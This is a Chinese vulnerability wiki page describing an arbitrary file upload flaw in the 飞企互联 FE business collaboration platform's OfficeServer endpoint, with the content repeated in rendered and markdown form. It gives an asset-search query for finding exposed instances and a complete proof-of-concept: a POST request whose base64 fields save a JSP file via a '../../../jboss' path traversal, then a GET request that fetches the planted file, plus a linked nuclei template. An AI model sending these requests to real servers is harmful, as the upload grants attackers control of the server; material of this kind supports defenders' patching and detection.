fofamini-wiki

登录白背景

源码

飞企互联FE业务协作平台OfficeServer任意文件上传漏洞

一、漏洞简介

FE 办公协作平台是实现应用开发、运行、管理、维护的信息管理平台。飞企互联FE业务协作平台OfficeServer任意文件上传漏洞，攻击者可通过该漏洞获取服务器权限。。

二、影响版本

飞企互联FE业务协作平台

三、资产测绘

hunterapp.name=="飞企互联 FE 6.0+"||app.name=="飞企互联 FE"
登录页面

四、漏洞复现

POST /iweboffice/OfficeServer.js%70 HTTP/1.1
Host: {hostname}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0.60dabdd3d70bcd96
Content-Length: 185
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Accept-Encoding: gzip, deflate

DBSTEP V3.0     93                     0        28              DBSTEP=REJTVEVQ
OPTION=U0FWRUZJTEU=
RECORDID=Li4vLi4vLi4vamJvc3Mvd2ViL2ZlLndhci91aWQuanNw
<%out.println("lOKB4C9g");%>

上传文件位置

GET /uid.jsp;.js HTTP/1.1
Host: {hostname}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0.60dabdd3d70bcd96
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Cookie: JSESSIONID=C02FFC1F802DE5889538E7D4DA810501

nuclei脚本
飞企互联fe-officeserver-任意文件上传.yaml

原文: https://www.yuque.com/xiaokp7/ocvun2/bqasu57lh6hszgqv

# 飞企互联FE业务协作平台OfficeServer任意文件上传漏洞

# 一、漏洞简介
FE 办公协作平台是实现应用开发、运行、管理、维护的信息管理平台。飞企互联FE业务协作平台OfficeServer任意文件上传漏洞，攻击者可通过该漏洞获取服务器权限。。

# 二、影响版本

- 飞企互联FE业务协作平台

# 三、资产测绘

- hunter`app.name=="飞企互联 FE 6.0+"`||`app.name=="飞企互联 FE"`
- 登录页面

![image.png](./img/GRIWBE-zYbtQv4PI/1692266465639-4e39b2e2-11b3-413b-a119-1c569b2deb21-475466.png)

# 四、漏洞复现
```
POST /iweboffice/OfficeServer.js%70 HTTP/1.1
Host: {hostname}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0.60dabdd3d70bcd96
Content-Length: 185
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Accept-Encoding: gzip, deflate

DBSTEP V3.0     93                     0        28              DBSTEP=REJTVEVQ
OPTION=U0FWRUZJTEU=
RECORDID=Li4vLi4vLi4vamJvc3Mvd2ViL2ZlLndhci91aWQuanNw
<%out.println("lOKB4C9g");%>
```
![image.png](./img/GRIWBE-zYbtQv4PI/1703434590743-7c414cb2-e60f-41f8-a9c3-9ae975a515f3-184290.png)
上传文件位置
```
GET /uid.jsp;.js HTTP/1.1
Host: {hostname}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0.60dabdd3d70bcd96
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Cookie: JSESSIONID=C02FFC1F802DE5889538E7D4DA810501
```
![image.png](./img/GRIWBE-zYbtQv4PI/1703434646803-84feb4a0-2dce-4a34-b792-78e05daf7aaa-417145.png)
nuclei脚本
[飞企互联fe-officeserver-任意文件上传.yaml](https://www.yuque.com/attachments/yuque/0/2024/yaml/1622799/1709219603711-29b1bb4d-3997-4387-985f-5af7495f94c2.yaml?_lake_card=%7B%22src%22%3A%22https%3A%2F%2Fwww.yuque.com%2Fattachments%2Fyuque%2F0%2F2024%2Fyaml%2F1622799%2F1709219603711-29b1bb4d-3997-4387-985f-5af7495f94c2.yaml%22%2C%22name%22%3A%22%E9%A3%9E%E4%BC%81%E4%BA%92%E8%81%94fe-officeserver-%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0.yaml%22%2C%22size%22%3A1745%2C%22ext%22%3A%22yaml%22%2C%22source%22%3A%22%22%2C%22status%22%3A%22done%22%2C%22download%22%3Atrue%2C%22taskId%22%3A%22u54b26355-d05b-462e-adb8-24101601f8f%22%2C%22taskType%22%3A%22upload%22%2C%22type%22%3A%22application%2Fx-yaml%22%2C%22__spacing%22%3A%22both%22%2C%22mode%22%3A%22title%22%2C%22id%22%3A%22u6fe72d23%22%2C%22margin%22%3A%7B%22top%22%3Atrue%2C%22bottom%22%3Atrue%7D%2C%22card%22%3A%22file%22%7D)

> 原文: <https://www.yuque.com/xiaokp7/ocvun2/bqasu57lh6hszgqv>